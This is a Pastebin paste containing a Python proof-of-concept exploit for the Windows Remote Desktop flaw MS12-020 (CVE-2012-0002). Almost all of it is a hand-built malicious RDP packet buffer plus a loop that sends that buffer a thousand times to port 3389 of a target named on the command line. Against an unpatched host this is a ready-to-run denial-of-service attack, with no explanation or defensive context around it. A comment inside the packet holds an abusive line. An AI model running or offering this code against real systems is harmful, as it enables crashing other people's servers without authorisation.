SHARE
TWEET

MS12-020 / CVE-2012-0002 Vulnerability

a guest Mar 18th, 2012 12,836 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MS12-020 / CVE-2012-0002 Vulnerability - Proof of Concept
  2. # BlackBap.Org
  3.  
  4. import socket
  5. import sys
  6.  
  7.  
  8. buf=""
  9. buf+="\x03\x00\x00\x13" # TPKT, Version 3, lenght 19
  10. buf+="\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00" # ITU-T Rec X.224
  11. buf+="\x03\x00\x01\xd6" # TPKT, Version 3, lenght 470
  12. buf+="\x02\xf0\x80" # ITU-T Rec X.224
  13. buf+="\x7f\x65\x82\x01\x94\x04" #MULTIPOINT-COMMUNICATION-SERVICE T.125
  14.  
  15. buf+="\x01\x01\x04\x01\x01\x01\x01\xff" # "Fuck you Chelios" packet
  16. buf+="\x30\x19\x02\x04\x00\x00\x00\x00"
  17. buf+="\x02\x04\x00\x00\x00\x02\x02\x04"
  18. buf+="\x00\x00\x00\x00\x02\x04\x00\x00"
  19. buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
  20. buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
  21. buf+="\xff\xff\x02\x04\x00\x00\x00\x02"
  22. buf+="\x30\x19\x02\x04\x00\x00\x00\x01"
  23. buf+="\x02\x04\x00\x00\x00\x01\x02\x04"
  24. buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
  25. buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
  26. buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
  27. buf+="\x04\x20\x02\x04\x00\x00\x00\x02"
  28. buf+="\x30\x1c\x02\x02\xff\xff\x02\x02"
  29. buf+="\xfc\x17\x02\x02\xff\xff\x02\x04"
  30. buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
  31. buf+="\x00\x00\x02\x04\x00\x00\x00\x01"
  32. buf+="\x02\x02\xff\xff\x02\x04\x00\x00"
  33. buf+="\x00\x02\x04\x82\x01\x33\x00\x05"
  34. buf+="\x00\x14\x7c\x00\x01\x81\x2a\x00"
  35. buf+="\x08\x00\x10\x00\x01\xc0\x00\x44"
  36. buf+="\x75\x63\x61\x81\x1c\x01\xc0\xd8"
  37. buf+="\x00\x04\x00\x08\x00\x80\x02\xe0"
  38. buf+="\x01\x01\xca\x03\xaa\x09\x04\x00"
  39. buf+="\x00\xce\x0e\x00\x00\x48\x00\x4f"
  40. buf+="\x00\x53\x00\x54\x00\x00\x00\x00"
  41. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  42. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  43. buf+="\x00\x00\x00\x00\x00\x04\x00\x00"
  44. buf+="\x00\x00\x00\x00\x00\x0c\x00\x00"
  45. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  46. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  47. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  48. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  49. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  50. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  51. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  52. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  53. buf+="\x00\x01\xca\x01\x00\x00\x00\x00"
  54. buf+="\x00\x10\x00\x07\x00\x01\x00\x30"
  55. buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
  56. buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
  57. buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
  58. buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
  59. buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
  60. buf+="\x00\x30\x00\x30\x00\x00\x00\x00"
  61. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  62. buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
  63. buf+="\x00\x00\x00\x00\x00\x04\xc0\x0c"
  64. buf+="\x00\x0d\x00\x00\x00\x00\x00\x00"
  65. buf+="\x00\x02\xc0\x0c\x00\x1b\x00\x00"
  66. buf+="\x00\x00\x00\x00\x00\x03\xc0\x2c"
  67. buf+="\x00\x03\x00\x00\x00\x72\x64\x70"
  68. buf+="\x64\x72\x00\x00\x00\x00\x00\x80"
  69. buf+="\x80\x63\x6c\x69\x70\x72\x64\x72"
  70. buf+="\x00\x00\x00\xa0\xc0\x72\x64\x70"
  71. buf+="\x73\x6e\x64\x00\x00\x00\x00\x00"
  72. buf+="\xc0"
  73.  
  74. buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
  75. buf+="\x02\xf0\x80"  # ITU-T Rec X.224
  76. buf+="\x04\x01\x00\x01\x00" # MULTIPOINT-COMMUNICATION-SERVICE T.125
  77. buf+="\x03\x00\x00\x08" #TPKT, Version 3, Length 8
  78. buf+="\x02\xf0\x80" # ITU-T Rec X.224
  79. buf+="\x28" # MULTIPOINT-COMM-SERVICE T.125
  80. buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
  81. buf+="\x02\xf0\x80" # ITU-T Rec X.224
  82. buf+="\x38\x00\x06\x03\xef" # MULTIPOINT-COMM-SERVICE T.125
  83. buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
  84. buf+="\x02\xf0\x80" #ITU-T Rec X.224
  85. buf+="\x38\x00\x06\x03\xeb" # MULTIPOINT-COMM-SERVICE T.125
  86. buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
  87. buf+="\x02\xf0\x80" #ITU-T Rec X.224
  88. buf+="\x38\x00\x06\x03\xec"# MULTIPOINT-COMM-SERVICE T.125
  89. buf+="\x03\x00\x00\x0c"  # TPKT, Version 3, Lenght 12
  90. buf+="\x02\xf0\x80" #ITU-T Rec X.224
  91. buf+="\x38\x00\x06\x03\xed"# MULTIPOINT-COMM-SERVICE T.125
  92. buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
  93. buf+="\x02\xf0\x80" #ITU-T Rec X.224
  94. buf+="\x38\x00\x06\x03\xee"# MULTIPOINT-COMM-SERVICE T.125
  95. buf+="\x03\x00\x00\x0b" # TPKT, Version 3, Lenght 12
  96. buf+="\x06\xd0\x00\x00\x12\x34\x00"  #ITU-T Rec X.224
  97.  
  98. HOST = sys.argv[1]
  99. PORT = 3389
  100. for i in range(1000):
  101.  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  102.  s.connect((HOST,PORT))
  103.  print "sending: %d bytes" % len(buf)
  104.  s.send(buf)
  105.  rec = s.recv(100)
  106.  print "received: %d bytes" % len(rec)
  107.  s.close()
  108. # BlackBap.Org
RAW Paste Data
Want to get better at Python?
Learn to code Python in 2017
Pastebin PRO Summer Special!
Get 40% OFF on Pastebin PRO accounts!
Top